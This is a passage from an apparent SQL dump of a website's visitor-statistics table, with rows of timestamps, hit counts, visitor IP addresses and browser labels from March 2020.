rome'),(491589,1585089176,1,1,0,0,'111.178.204.193','chrome'),(491590,1585089225,2,2,0,0,'66.249.64.25','chrome'),(491591,1585089435,1,1,0,0,'213.180.203.118','other'),(491592,1585089682,1,1,0,0,'66.249.70.36','chrome'),(491593,1585090351,1,0,1,0,'157.55.39.22',''),(491594,1585090553,2,2,0,0,'8.29.198.25','other'),(491595,1585091347,1,1,0,0,'66.249.64.25','chrome'),(491596,1585091761,1,1,0,0,'66.249.64.24','chrome'),(491597,1585092396,1,1,0,0,'66.249.64.23','chrome'),(491598,1585092896,1,1,0,0,'207.46.13.64','other'),(491599,1585093385,3,3,0,0,'66.249.64.23','chrome'),(491600,1585093619,1,1,0,0,'66.249.70.33','chrome'),(491601,1585093847,2,2,0,0,'66.249.64.25','chrome'),(491602,1585094093,1,1,0,0,'66.249.64.24','chrome'),(491603,1585094608,1,1,0,0,'157.55.39.145','other'),(491604,1585094774,1,1,0,0,'112.251.75.239','chrome'),(491605,1585095047,2,2,0,0,'66.249.64.25','chrome'),(491606,1585095379,1,1,0,0,'213.180.203.186','other'),(491607,1585097508,1,0,1,0,'207.46.13.64',''),(491608,1585097705,1,1,0,0,'62.205.134.182','other'),(491609,1585097990,1,1,0,0,'125.78.102.130','chrome'),(491610,1585098684,1,1,0,0,'222.222.238.195','chrome'),(491611,1585099002,1,1,0,0,'66.249.64.23','chrome'),(491612,1585099681,1,1,0,0,'207.46.13.97','other'),(491613,1585100627,2,2,0,0,'66.249.64.23','chrome'),(491614,1585101365,1,1,0,0,'66.249.64.25','chrome'),(491615,1585101379,1,1,0,0,'8.29.198.26','other'),(491616,1585102174,1,1,0,0,'8.29.198.25','other'),(491617,1585102350,1,1,0,0,'213.180.203.186','other'),(491618,1585102839,2,2,0,0,'66.249.64.25','chrome'),(491619,1585103073,1,1,0,0,'66.249.64.24','chrome'),(491620,1585103199,2,2,0,0,'66.249.64.23','chrome'),(491621,1585103284,1,1,0,0,'213.180.203.186','other'),(491622,1585103608,1,1,0,0,'175.167.181.169','chrome'),(491623,1585104621,1,1,0,0,'95.132.50.40','firefox'),(491624,1585104633,1,1,0,0,'66.249.70.33','chrome'),(491625,1585105555,1,1,0,0,'66.249.70.33','chrome'),(491626,1585105581,1,1,0,0,'66.249.64.25','chrome'),(491627,1585105602,1,1,0,0,'178.154.200.87','other'),(491628,1585105699,2,2,0,0,'66.249.64.23','chrome'),(491629,1585105795,1,0,1,0,'157.55.39.22',''),(491630,1585106444,1,1,0,0,'112.23.153.247','chrome'),(491631,1585106455,1,1,0,0,'106.114.253.123','chrome'),(491632,1585106814,1,1,0,0,'207.46.13.64','other'),(491633,1585106850,3,3,0,0,'66.249.64.25','chrome'),(491634,1585106891,3,2,1,0,'207.46.13.97',''),(491635,1585107043,3,3,0,0,'66.249.64.24','chrome'),(491636,1585107419,2,1,1,0,'66.249.64.23',''),(491637,1585108001,2,2,0,0,'66.249.64.23','chrome'),(491638,1585108475,2,2,0,0,'66.249.64.24','chrome'),(491639,1585108529,1,1,0,0,'66.249.70.36','chrome'),(491640,1585108583,1,1,0,0,'66.249.64.25','chrome'),(491641,1585108655,1,1,0,0,'116.55.141.141','chrome'),(491642,1585108666,1,1,0,0,'106.7.41.162','chrome'),(491643,1585110717,2,2,0,0,'66.249.64.24','chrome'),(491644,1585110850,2,2,0,0,'213.180.203.186','other'),(491645,1585111322,2,2,0,0,'66.249.70.36','chrome'),(491646,1585111682,3,3,0,0,'66.249.64.23','chrome'),(491647,1585111891,2,2,0,0,'66.249.64.25','chrome'),(491648,1585112052,3,3,0,0,'66.249.64.24','chrome'),(491649,1585112211,1,1,0,0,'8.29.198.26','other'),(491650,1585112216,1,1,0,0,'207.46.13.97','other'),(491651,1585112877,1,1,0,0,'113.110.63.183','chrome'),(491652,1585112965,3,3,0,0,'66.249.64.24','chrome'),(491653,1585112998,1,1,0,0,'8.29.198.27','other'),(491654,1585113032,1,1,0,0,'213.180.203.186','other'),(491655,1585113061,2,2,0,0,'66.249.64.23','chrome'),(491656,1585113099,1,1,0,0,'157.55.39.22','other'),(491657,1585114005,3,3,0,0,'66.249.64.25','chrome'),(491658,1585114347,1,1,0,0,'213.180.203.186','other'),(491659,1585114416,2,2,0,0,'66.249.64.24','chrome'),(491660,1585114536,1,1,0,0,'66.249.70.36','chrome'),(491661,1585114554,2,2,0,0,'66.249.64.23','chrome'),(491662,1585114586,1,1,0,0,'113.1.173.16','chrome'),(491663,1585114602,1,1,0,0,'120.193.204.119','chrome'),(491664,1585114670,1,1,0,0,'157.122.168.136','chrome'),(491665,1585114772,1,1,0,0,'62.205.134.182','other'),(491666,1585115950,1,1,0,0,'66.249.64.23','chrome'),(491667,1585115953,1,1,0,0,'207.46.13.64','other'),(491668,1585115996,1,1,0,0,'49.74.49.211','chrome'),(491669,1585116159,1,1,0,0,'223.114.244.6','chrome'),(491670,1585116190,1,1,0,0,'66.249.64.25','chrome'),(491671,1585116238,2,2,0,0,'66.249.64.24','chrome'),(491672,1585116383,1,1,0,0,'183.166.161.142','chrome'),(491673,1585116784,1,1,0,0,'66.249.70.36','chrome'),(491674,1585116886,1,1,0,0,'66.249.64.23','chrome'),(491675,1585116965,1,1,0,0,'66.249.70.33','chrome'),(491676,1585117301,1,1,0,0,'1.80.184.35','chrome'),(491677,1585117318,1,1,0,0,'222.219.25.124','chrome'),(491678,1585117629,1,1,0,0,'91.196.179.25','chrome'),(491679,1585118289,3,3,0,0,'66.249.70.36','chrome'),(491680,1585119505,2,2,0,0,'66.249.64.25','chrome'),(491681,1585119583,1,1,0,0,'66.249.70.33','chrome'),(491682,1585120052,1,1,0,0,'219.132.210.106','chrome'),(491683,1585120057,1,1,0,0,'122.238.44.131','chrome'),(491684,1585120064,1,1,0,0,'58.217.3.249','chrome'),(491685,1585120117,1,1,0,0,'66.249.70.36','chrome'),(491686,1585120171,1,1,0,0,'66.249.64.23','chrome'),(491687,1585120285,1,1,0,0,'66.249.64.24','chrome'),(491688,1585120578,2,2,0,0,'66.249.64.25','chrome'),(491689,1585120705,1,1,0,0,'123.12.60.76','chrome'),(491690,1585121274,1,1,0,0,'66.249.64.23','chrome'),(491691,1585121723,1,1,0,0,'58.54.28.79','chrome'),(491692,1585121739,1,1,0,0,'111.126.95.146','chrome'),(491693,1585122041,1,1,0,0,'66.249.70.33','chrome'),(491694,1585122157,1,1,0,0,'91.196.177.46','chrome'),(491695,1585122689,2,2,0,0,'66.249.64.25','chrome'),(491696,1585122803,1,0,1,0,'207.46.13.64',''),(491697,1585123041,1,1,0,0,'8.29.198.27','other'),(491698,1585123281,1,1,0,0,'182.34.34.104','chrome'),(491699,1585123289,1,1,0,0,'124.113.219.37','chrome'),(491700,1585123300,1,1,0,0,'66.249.70.33','chrome'),(491701,1585123451,1,1,0,0,'91.196.179.25','chrome'),(491702,1585123552,3,3,0,0,'66.249.64.23','chrome'),(491703,1585123821,1,1,0,0,'8.29.198.26','other'),(491704,1585124182,1,1,0,0,'117.91.253.139','chrome'),(491705,1585124601,1,1,0,0,'66.249.64.23','chrome'),(491706,1585124931,1,1,0,0,'66.249.70.36','chrome'),(491707,1585125454,1,1,0,0,'37.73.73.30','chrome'),(491708,1585126155,1,1,0,0,'91.196.177.46','chrome'),(491709,1585126474,1,1,0,0,'91.196.178.68','chrome'),(491710,1585127041,2,2,0,0,'66.249.64.24','chrome'),(491711,1585127251,5,5,0,0,'66.249.64.23','chrome'),(491712,1585128630,1,1,0,0,'91.196.177.46','chrome'),(491713,1585129055,4,4,0,0,'66.249.64.23','chrome'),(491714,1585129290,1,1,0,0,'66.249.64.24','chrome'),(491715,1585130383,4,4,0,0,'66.249.64.23','chrome'),(491716,1585130404,1,1,0,0,'66.249.64.24','chrome'),(491717,1585130495,1,1,0,0,'3.234.141.155','chrome'),(491718,1585130566,1,1,0,0,'66.249.70.33','chrome'),(491719,1585130686,1,1,0,0,'66.249.70.36','chrome'),(491720,1585130718,1,1,0,0,'175.168.152.64','chrome'),(491721,1585131260,1,1,0,0,'124.113.192.231','chrome'),(491722,1585131935,1,1,0,0,'213.180.203.10','other'),(491723,1585132161,3,3,0,0,'91.196.178.175','chrome'),(491724,1585132416,1,1,0,0,'128.124.182.199','chrome'),(491725,1585132650,1,1,0,0,'207.46.13.64','other'),(491726,1585133191,1,1,0,0,'213.180.203.186','other'),(491727,1585133867,1,1,0,0,'8.29.198.25','other'),(491728,1585133932,1,1,0,0,'173.252.111.6','other'),(491729,1585134288,1,1,0,0,'207.46.13.64','other'),(491730,1585134306,1,1,0,0,'121.56.36.89','chrome'),(491731,1585134330,2,2,0,0,'95.213.141.126','opera'),(491732,1585134343,2,2,0,0,'213.180.203.186','other'),(491733,1585134637,1,1,0,0,'66.249.64.24','chrome'),(491734,1585134642,1,1,0,0,'8.29.198.27','other'),(491735,1585136303,2,2,0,0,'66.249.64.23','chrome'),(491736,1585136431,1,1,0,0,'61.146.162.225','chrome'),(491737,1585136797,1,1,0,0,'66.249.64.24','chrome'),(491738,1585136891,1,1,0,0,'66.249.70.36','chrome'),(491739,1585137082,1,1,0,0,'109.74.154.72','chrome'),(491740,1585137443,1,1,0,0,'213.180.203.13','other'),(491741,1585137678,1,1,0,0,'157.55.39.81','other'),(491742,1585137983,1,1,0,0,'69.28.91.10','chrome'),(491743,1585138178,1,1,0,0,'157.55.39.22','other'),(491744,1585138575,2,2,0,0,'207.46.13.64','other'),(491745,1585139560,1,1,0,0,'66.249.64.25','chrome'),(491746,1585139721,1,1,0,0,'91.202.160.118','chrome'),(491747,1585140016,4,3,1,0,'66.249.64.23',''),(491748,1585140127,1,1,0,0,'173.252.111.14','other'),(491749,1585140128,1,1,0,0,'173.252.111.1','other'),(491750,1585140129,1,1,0,0,'173.252.111.8','other'),(491752,1585140268,1,1,0,0,'66.249.70.36','chrome'),(491753,1585140313,1,1,0,0,'163.142.248.52','chrome'),(491754,1585140316,1,1,0,0,'113.17.151.195','chrome'),(491755,1585140411,3,3,0,0,'66.249.64.23','chrome'),(491756,1585140475,2,2,0,0,'66.249.64.24','chrome'),(491757,1585140516,1,1,0,0,'66.249.64.25','chrome'),(491758,1585141037,1,1,0,0,'207.46.13.64','other'),(491759,1585141126,1,1,0,0,'66.249.70.33','chrome'),(491760,1585141984,2,2,0,0,'66.249.64.25','chrome'),(491761,1585142697,1,1,0,0,'207.46.13.64','other'),(491762,1585142744,1,1,0,0,'223.104.9.170','chrome'),(491763,1585142757,1,1,0,0,'112.227.143.35','chrome'),(491764,1585142945,1,1,0,0,'157.55.39.81','other'),(491765,1585143051,1,1,0,0,'91.196.178.140','firefox'),(491766,1585143680,1,1,0,0,'209.17.96.90','other'),(491767,1585143777,1,1,0,0,'66.249.64.23','chrome'),(491768,1585144703,1,1,0,0,'8.29.198.25','other'),(491769,1585145475,1,1,0,0,'8.29.198.26','other'),(491770,1585145513,2,1,1,0,'66.249.64.24',''),(491771,1585145722,1,0,1,0,'66.249.64.23',''),(491772,1585145744,1,1,0,0,'66.249.64.23','chrome'),(491773,1585145823,1,1,0,0,'207.46.13.64','other'),(491774,1585146170,1,1,0,0,'213.180.203.186','other'),(491775,1585146250,1,1,0,0,'131.220.6.152','chrome'),(491776,1585146379,1,1,0,0,'117.91.130.129','chrome'),(491777,1585146384,1,1,0,0,'183.94.211.189','chrome'),(491778,1585146544,1,1,0,0,'213.180.203.11','other'),(491779,1585147134,2,2,0,0,'66.249.64.23','chrome'),(491780,1585147810,1,1,0,0,'66.249.64.25','chrome'),(491781,1585148076,1,1,0,0,'157.55.39.81','other'),(491782,1585148121,1,0,1,0,'157.55.39.22',''),(491783,1585148553,1,1,0,0,'157.55.39.22','other'),(491784,1585150394,1,0,1,0,'207.46.13.32',''),(491785,1585150594,1,1,0,0,'117.64.250.198','chrome'),(491786,1585150597,1,1,0,0,'218.66.247.224','chrome'),(491787,1585151014,1,1,0,0,'66.249.64.25','chrome'),(491788,1585151146,1,1,0,0,'218.69.174.54','chrome'),(491789,1585151550,1,1,0,0,'157.55.39.22','other'),(491790,1585151656,1,1,0,0,'115.148.26.203','chrome'),(491791,1585151659,1,1,0,0,'182.101.30.128','chrome'),(491792,1585151715,1,0,1,0,'207.46.13.64',''),(491793,1585152236,1,1,0,0,'157.55.39.81','other'),(491794,1585152286,1,1,0,0,'213.180.203.186','other'),(491795,1585152384,1,1,0,0,'66.249.64.24','chrome'),(491796,1585153070,2,2,0,0,'66.249.64.23','chrome'),(491797,1585153318,1,1,0,0,'173.252.111.9','other'),(491798,1585153319,1,1,0,0,'173.252.111.12','other'),(491799,1585153356,1,1,0,0,'27.38.9.127','chrome'),(491800,1585153377,1,1,0,0,'207.46.13.64','other'),(491801,1585154173,1,1,0,0,'213.180.203.186','other'),(491802,1585154996,1,1,0,0,'218.88.142.115','chrome'),(491803,1585155090,1,1,0,0,'66.249.64.24','chrome'),(491804,1585155180,1,1,0,0,'91.196.178.75','chrome'),(491805,1585155533,1,1,0,0,'8.29.198.25','other'),(491806,1585156296,1,1,0,0,'8.29.198.26','other'),(491807,1585156448,1,1,0,0,'66.249.70.36','chrome'),(491808,1585157148,1,1,0,0,'157.55.39.22','other'),(491809,1585157251,1,1,0,0,'207.46.13.64','other'),(491810,1585157860,1,1,0,0,'66.249.70.36','chrome'),(491811,1585157897,1,1,0,0,'66.249.76.114','chrome'),(491812,1585158338,1,1,0,0,'178.154.200.222','other'),(491813,1585158908,1,1,0,0,'66.249.64.24','chrome'),(491814,1585159240,2,2,0,0,'66.249.64.25','chrome'),(491815,1585159247,1,0,1,0,'157.55.39.22',''),(491816,1585160961,1,0,1,0,'157.55.39.22',''),(491817,1585161253,2,2,0,0,'66.249.64.25','chrome'),(491818,1585161443,1,1,0,0,'173.252.111.22','other'),(491819,1585161596,2,2,0,0,'66.249.64.24','chrome'),(491820,1585162038,1,1,0,0,'91.196.178.132','chrome'),(491821,1585162357,2,2,0,0,'207.46.13.64','other'),(491822,1585164323,1,1,0,0,'178.154.200.222','other'),(491823,1585165066,1,1,0,0,'66.249.70.33','chrome'),(491824,1585165185,1,1,0,0,'207.46.13.64','other'),(491825,1585165508,1,0,1,0,'157.55.39.22',''),(491826,1585166337,1,1,0,0,'157.55.39.22','other'),(491827,1585166365,2,2,0,0,'8.29.198.25','other'),(491828,1585166895,1,1,0,0,'207.46.13.150','other'),(491829,1585166919,1,1,0,0,'178.154.200.222','other'),(491830,1585167761,1,1,0,0,'54.218.109.206','chrome'),(491831,1585167882,2,2,0,0,'66.249.64.23','chrome'),(491832,1585168262,1,1,0,0,'157.55.39.81','other'),(491833,1585168420,1,1,0,0,'134.122.55.157','firefox'),(491834,1585168540,1,1,0,0,'95.132.57.50','chrome'),(491835,1585168799,3,3,0,0,'178.154.200.222','other'),(491836,1585168983,2,2,0,0,'66.249.64.23','chrome'),(491837,1585169368,3,3,0,0,'66.249.64.24','chrome'),(491838,1585169653,1,1,0,0,'66.249.70.38','chrome'),(491839,1585169660,1,1,0,0,'66.249.69.37','chrome'),(491840,1585169821,1,1,0,0,'178.154.200.222','other'),(491841,1585170363,1,1,0,0,'66.249.64.23','chrome'),(491842,1585170435,1,1,0,0,'207.46.13.64','other'),(491843,1585170772,1,1,0,0,'66.249.70.38','chrome'),(491844,1585171630,1,1,0,0,'194.44.228.210','chrome'),(491845,1585173633,1,1,0,0,'157.55.39.22','other'),(491846,1585173992,2,2,0,0,'66.249.64.24','chrome'),(491847,1585174474,1,1,0,0,'66.249.64.23','chrome'),(491848,1585174997,1,1,0,0,'111.72.98.106','chrome'),(491849,1585175391,1,1,0,0,'66.249.64.23','chrome'),(491850,1585175642,1,1,0,0,'66.249.64.24','chrome'),(491851,1585175915,1,0,1,0,'157.55.39.22',''),(491852,1585176000,1,1,0,0,'207.46.13.150','other'),(491853,1585176453,1,1,0,0,'66.249.70.36','chrome'),(491854,1585176467,1,1,0,0,'178.154.200.222','other'),(491855,1585176549,2,2,0,0,'66.249.64.24','chrome'),(491856,1585176887,1,1,0,0,'66.249.70.33','chrome'),(491857,1585176922,1,0,1,0,'157.55.39.22',''),(491858,1585177201,2,2,0,0,'8.29.198.25','other'),(491859,1585177254,1,1,0,0,'66.249.64.23','chrome'),(491860,1585177737,1,1,0,0,'207.46.13.64','other'),(491861,1585178459,1,1,0,0,'209.17.96.114','other'),(491862,1585179001,1,1,0,0,'66.249.64.24','chrome'),(491863,1585179864,1,1,0,0,'207.46.13.150','other'),(491864,1585179908,1,1,0,0,'66.249.64.25','chrome'),(491865,1585180217,1,1,0,0,'66.249.70.38','chrome'),(491866,1585180372,3,3,0,0,'157.55.39.22','other'),(491867,1585180777,2,2,0,0,'66.249.64.23','chrome'),(491868,1585181144,1,1,0,0,'66.249.64.25','chrome'),(491869,1585181158,8,8,0,0,'77.120.98.235','other'),(491870,1585181288,1,1,0,0,'178.154.200.222','other'),(491871,1585181808,2,2,0,0,'178.154.171.134','other'),(491872,1585182968,1,1,0,0,'183.251.174.221','chrome'),(491873,1585182977,1,1,0,0,'112.20.101.120','chrome'),(491874,1585184105,1,1,0,0,'62.205.134.182','other'),(491875,1585184697,3,3,0,0,'157.55.39.81','other'),(491876,1585185043,2,2,0,0,'66.249.64.23','chrome'),(491877,1585185199,1,1,0,0,'91.209.11.236','other'),(491878,1585185396,1,1,0,0,'66.249.64.25','chrome'),(491879,1585186211,2,2,0,0,'66.249.64.23','chrome'),(491880,1585186481,2,2,0,0,'178.154.200.222','other'),(491881,1585186877,2,2,0,0,'66.249.64.25','chrome'),(491882,1585186935,1,1,0,0,'116.5.239.17','chrome'),(491883,1585186944,1,1,0,0,'59.53.16.50','chrome'),(491884,1585186964,1,1,0,0,'117.23.111.191','chrome'),(491885,1585186987,1,1,0,0,'222.220.153.106','chrome'),(491886,1585187058,1,1,0,0,'35.164.118.18','other'),(491887,1585187087,1,1,0,0,'157.55.39.81','other'),(491888,1585187098,2,2,0,0,'207.46.13.64','other'),(491889,1585187130,1,1,0,0,'110.52.224.30','chrome'),(491890,1585187149,1,1,0,0,'119.53.72.249','chrome'),(491891,1585187155,1,1,0,0,'36.26.206.192','chrome'),(491892,1585187172,1,1,0,0,'180.119.141.36','chrome'),(491893,1585187381,1,1,0,0,'125.68.9.202','chrome'),(491894,1585187649,2,2,0,0,'66.249.64.23','chrome'),(491895,1585187784,1,1,0,0,'115.57.133.188','chrome'),(491896,1585187788,1,1,0,0,'117.177.160.34','chrome'),(491897,1585188015,1,1,0,0,'66.249.64.24','chrome'),(491898,1585188030,1,1,0,0,'8.29.198.26','other'),(491899,1585188147,1,1,0,0,'207.46.13.150','other'),(491900,1585188262,1,1,0,0,'178.154.200.216','other'),(491901,1585188401,1,1,0,0,'66.249.64.25','chrome'),(491902,1585188614,2,2,0,0,'66.249.64.23','chrome'),(491903,1585188782,1,1,0,0,'8.29.198.25','other'),(491904,1585189458,1,1,0,0,'207.46.13.150','other'),(491905,1585189879,1,1,0,0,'178.154.200.222','other'),(491906,1585190511,1,0,1,0,'207.46.13.64',''),(491907,1585190837,2,0,2,0,'207.46.13.150',''),(491908,1585190944,1,1,0,0,'66.249.64.24','chrome'),(491909,1585191213,1,1,0,0,'207.46.13.64','other'),(491910,1585191230,1,1,0,0,'66.249.70.33','chrome'),(491911,1585191371,1,1,0,0,'157.55.39.22','other'),(491912,1585191598,1,1,0,0,'125.123.123.74','chrome'),(491913,1585191601,1,1,0,0,'106.8.208.16','chrome'),(491914,1585191611,1,1,0,0,'114.97.243.47','chrome'),(491915,1585191619,1,1,0,0,'1.204.114.14','chrome'),(491916,1585191623,1,1,0,0,'180.126.187.233','chrome'),(491917,1585191637,1,1,0,0,'112.84.72.49','chrome'),(491918,1585191876,2,2,0,0,'66.249.64.25','chrome'),(491919,1585192228,1,1,0,0,'66.249.64.24','chrome'),(491920,1585192554,2,2,0,0,'207.46.13.64','other'),(491921,1585192821,1,0,1,0,'157.55.39.22',''),(491922,1585192954,1,1,0,0,'178.154.200.222','other'),(491923,1585193105,1,1,0,0,'207.46.13.150','other'),(491924,1585193150,1,0,1,0,'66.249.64.24',''),(491925,1585193458,1,1,0,0,'66.249.64.24','chrome'),(491926,1585193488,1,1,0,0,'66.249.64.23','chrome'),(491927,1585194627,1,1,0,0,'66.249.64.25','chrome'),(491928,1585194876,1,1,0,0,'178.154.200.222','other'),(491929,1585195100,1,0,1,0,'207.46.13.64',''),(491930,1585195563,2,2,0,0,'66.249.64.25','chrome'),(491931,1585195696,1,1,0,0,'122.4.29.177','chrome'),(491932,1585196115,1,1,0,0,'222.90.228.237','chrome'),(491933,1585196123,2,2,0,0,'66.249.70.33','chrome'),(491934,1585196132,1,1,0,0,'66.249.70.36','chrome'),(491935,1585196137,1,1,0,0,'124.79.66.158','chrome'),(491936,1585196138,1,1,0,0,'49.82.49.66','chrome'),(491937,1585196351,1,1,0,0,'113.100.96.229','chrome'),(491938,1585196736,1,1,0,0,'1.198.33.80','chrome'),(491939,1585197638,2,2,0,0,'66.249.64.24','chrome'),(491940,1585198203,1,1,0,0,'31.13.103.30','other'),(491941,1585198205,1,1,0,0,'31.13.103.20','other'),(491943,1585198246,1,1,0,0,'207.46.13.150','other'),(491944,1585198863,1,1,0,0,'8.29.198.26','other'),(491945,1585198912,1,1,0,0,'66.249.64.24','chrome'),(491946,1585199226,1,1,0,0,'114.230.104.140','chrome'),(491947,1585199420,1,1,0,0,'1.180.164.190','chrome'),(491948,1585199423,1,1,0,0,'110.52.227.202','chrome'),(491949,1585199563,1,1,0,0,'223.241.20.14','chrome'),(491950,1585199570,1,1,0,0,'116.179.217.251','chrome'),(491951,1585199612,1,1,0,0,'8.29.198.27','other'),(491952,1585199659,1,0,1,0,'207.46.13.150',''),(491953,1585199858,2,2,0,0,'66.249.64.24','chrome'),(491954,1585200193,1,1,0,0,'27.214.192.162','chrome'),(491955,1585200369,1,1,0,0,'207.46.13.150','other'),(491956,1585200769,1,1,0,0,'222.220.152.81','chrome'),(491957,1585200781,1,1,0,0,'110.7.219.230','chrome'),(491958,1585200997,2,2,0,0,'66.249.64.24','chrome'),(491959,1585201056,1,1,0,0,'222.210.108.93','chrome'),(491960,1585201215,1,1,0,0,'62.205.134.182','other'),(491961,1585201658,1,1,0,0,'178.154.200.222','other'),(491962,1585202159,1,1,0,0,'207.46.13.150','other'),(491963,1585202476,1,1,0,0,'157.55.39.22','other'),(491964,1585202492,1,1,0,0,'54.36.149.37','other'),(491965,1585203284,1,1,0,0,'66.249.64.25','chrome'),(491966,1585203294,1,0,1,0,'66.249.64.24',''),(491967,1585203295,1,1,0,0,'54.36.149.59','other'),(491968,1585203601,1,1,0,0,'115.148.41.166','chrome'),(491969,1585203609,1,1,0,0,'182.247.36.98','chrome'),(491970,1585204006,1,1,0,0,'113.221.16.198','chrome'),(491971,1585204633,1,1,0,0,'207.46.13.64','other'),(491972,1585204832,2,2,0,0,'157.55.39.22','other'),(491973,1585204877,1,1,0,0,'66.249.64.23','chrome'),(491974,1585204916,1,1,0,0,'106.57.151.246','chrome'),(491975,1585205045,1,1,0,0,'93.73.160.193','firefox'),(491976,1585205064,1,1,0,0,'54.36.149.105','other'),(491977,1585205203,3,3,0,0,'178.154.200.222','other'),(491978,1585205854,1,1,0,0,'54.36.149.107','other'),(491979,1585206167,1,1,0,0,'91.196.179.25','chrome'),(491980,1585206234,1,1,0,0,'218.69.75.0','chrome'),(491981,1585206764,1,1,0,0,'106.57.151.38','chrome'),(491982,1585207034,1,1,0,0,'183.94.208.46','chrome'),(491983,1585207294,2,2,0,0,'157.55.39.81','other'),(491984,1585207299,1,1,0,0,'207.46.13.150','other'),(491985,1585207669,1,1,0,0,'54.36.149.16','other'),(491986,1585207782,1,1,0,0,'66.249.64.23','chrome'),(491987,1585207830,1,1,0,0,'66.249.70.36','chrome'),(491988,1585207948,1,1,0,0,'66.249.64.25','chrome'),(491989,1585208548,1,1,0,0,'54.36.149.94','other'),(491990,1585209168,1,1,0,0,'66.249.64.23','chrome'),(491991,1585209403,2,2,0,0,'66.249.64.24','chrome'),(491992,1585209586,1,1,0,0,'66.249.70.36','chrome'),(491993,1585209700,2,2,0,0,'8.29.198.25','other'),(491994,1585210230,1,1,0,0,'58.216.67.183','chrome'),(491995,1585210252,1,1,0,0,'60.218.70.6','chrome'),(491996,1585210359,2,2,0,0,'66.249.64.23','chrome'),(491997,1585210812,1,1,0,0,'207.46.13.64','other'),(491998,1585210900,1,1,0,0,'178.154.200.222','other'),(491999,1585210918,2,2,0,0,'66.249.64.24','chrome'),(492000,1585210958,1,1,0,0,'91.196.178.185','chrome'),(492001,1585210996,1,1,0,0,'66.249.70.38','chrome'),(492002,1585211046,2,2,0,0,'207.46.13.150','other'),(492003,1585212080,1,1,0,0,'139.227.191.232','chrome'),(492004,1585212231,1,1,0,0,'66.249.70.36','chrome'),(492005,1585212459,1,1,0,0,'113.87.182.80','chrome'),(492006,1585212602,1,1,0,0,'46.133.110.122','chrome'),(492007,1585212772,2,2,0,0,'91.196.178.73','chrome'),(492008,1585212820,1,1,0,0,'66.249.64.24','chrome'),(492009,1585212889,1,1,0,0,'66.249.64.23','chrome'),(492010,1585213147,1,1,0,0,'207.46.13.64','other'),(492011,1585213235,1,1,0,0,'91.196.178.185','chrome'),(492012,1585213283,1,1,0,0,'178.154.200.222','other'),(492013,1585214178,2,2,0,0,'66.249.64.24','chrome'),(492014,1585214924,1,1,0,0,'66.249.64.23','chrome'),(492015,1585214953,1,1,0,0,'66.249.70.36','chrome'),(492016,1585215264,1,1,0,0,'173.252.111.13','other'),(492017,1585215273,1,1,0,0,'173.252.111.21','other'),(492018,1585215274,2,2,0,0,'173.252.111.4','other'),(492019,1585215277,2,2,0,0,'173.252.111.9','other'),(492020,1585215336,2,2,0,0,'173.252.111.2','other'),(492021,1585215474,2,2,0,0,'66.249.64.24','chrome'),(492022,1585215802,1,1,0,0,'66.249.70.33','chrome'),(492023,1585215817,1,1,0,0,'182.150.245.151','chrome'),(492024,1585216309,1,1,0,0,'54.36.149.51','other'),(492025,1585216374,1,1,0,0,'175.146.101.222','chrome'),(492026,1585216555,1,1,0,0,'82.207.41.255','chrome'),(492027,1585216562,1,1,0,0,'54.36.149.69','other'),(492028,1585216767,1,1,0,0,'66.249.64.23','chrome'),(492029,1585216860,2,2,0,0,'207.46.13.150','other'),(492030,1585217212,1,1,0,0,'115.209.212.187','chrome'),(492031,1585217318,1,1,0,0,'66.249.70.38','chrome'),(492032,1585217428,1,1,0,0,'18.216.151.225','chrome'),(492033,1585217734,1,1,0,0,'213.180.203.16','other'),(492034,1585217925,1,1,0,0,'54.36.149.82','other'),(492035,1585218242,1,1,0,0,'207.46.13.150','other'),(492036,1585218303,1,1,0,0,'27.44.27.137','chrome'),(492037,1585218439,1,1,0,0,'221.209.184.92','chrome'),(492038,1585218444,1,1,0,0,'112.64.52.228','chrome'),(492039,1585218523,1,1,0,0,'91.196.178.175','chrome'),(492040,1585218669,1,1,0,0,'66.249.70.33','chrome'),(492041,1585218953,1,1,0,0,'91.196.178.73','chrome'),(492042,1585218989,1,1,0,0,'66.249.64.24','chrome'),(492043,1585219091,1,1,0,0,'207.46.13.64','other'),(492044,1585219402,1,1,0,0,'178.154.200.222','other'),(492045,1585219516,2,2,0,0,'66.249.64.23','chrome'),(492046,1585219640,1,1,0,0,'66.249.64.25','chrome'),(492047,1585219977,2,2,0,0,'207.46.13.150','other'),(492048,1585220531,2,2,0,0,'8.29.198.27','other'),(492049,1585220560,1,1,0,0,'66.249.64.25','chrome'),(492050,1585220618,1,1,0,0,'66.249.64.23','chrome'),(492051,1585220793,1,1,0,0,'54.36.149.67','other'),(492052,1585221159,1,1,0,0,'66.249.64.24','chrome'),(492053,1585221262,1,1,0,0,'54.36.149.104','other'),(492054,1585221622,2,2,0,0,'66.249.64.25','chrome'),(492055,1585222163,1,1,0,0,'66.249.70.38','chrome'),(492056,1585222493,1,1,0,0,'157.55.39.81','other'),(492057,1585222607,1,1,0,0,'157.55.39.22','other'),(492058,1585223137,1,1,0,0,'66.249.64.23','chrome'),(492059,1585223257,2,2,0,0,'207.46.13.150','other'),(492060,1585223359,4,4,0,0,'66.249.64.24','chrome'),(492061,1585223407,2,2,0,0,'66.249.64.25','chrome'),(492062,1585224183,1,1,0,0,'178.154.200.222','other'),(492063,1585224334,1,1,0,0,'66.249.64.24','chrome'),(492064,1585224616,1,1,0,0,'109.74.154.72','chrome'),(492065,1585224623,1,1,0,0,'66.249.64.25','chrome'),(492066,1585224628,1,1,0,0,'54.36.149.34','other'),(492067,1585224709,1,1,0,0,'157.55.39.81','other'),(492068,1585224715,1,1,0,0,'207.46.13.64','other'),(492069,1585224783,1,1,0,0,'180.129.0.201','chrome'),(492070,1585225534,1,1,0,0,'157.55.39.22','other'),(492071,1585225873,1,1,0,0,'49.76.156.24','chrome'),(492072,1585225949,1,1,0,0,'91.196.178.185','chrome'),(492073,1585225982,1,1,0,0,'66.249.64.23','chrome'),(492074,1585226266,1,1,0,0,'66.249.70.36','chrome'),(492075,1585226361,1,1,0,0,'207.46.13.64','other'),(492076,1585226386,2,2,0,0,'66.249.64.24','chrome'),(492077,1585226549,1,1,0,0,'207.46.13.150','other'),(492078,1585226847,1,1,0,0,'157.55.39.22','other'),(492079,1585226956,1,1,0,0,'54.36.149.96','other'),(492080,1585227148,8,8,0,0,'77.120.98.235','other'),(492081,1585227628,1,1,0,0,'178.154.200.222','other'),(492082,1585228036,1,1,0,0,'66.249.70.36','chrome'),(492083,1585228134,1,1,0,0,'3.214.215.106','other'),(492084,1585228412,1,1,0,0,'66.249.64.23','chrome'),(492085,1585228688,1,1,0,0,'66.249.64.25','chrome'),(492086,1585228829,1,1,0,0,'66.249.64.24','chrome'),(492087,1585229195,1,1,0,0,'1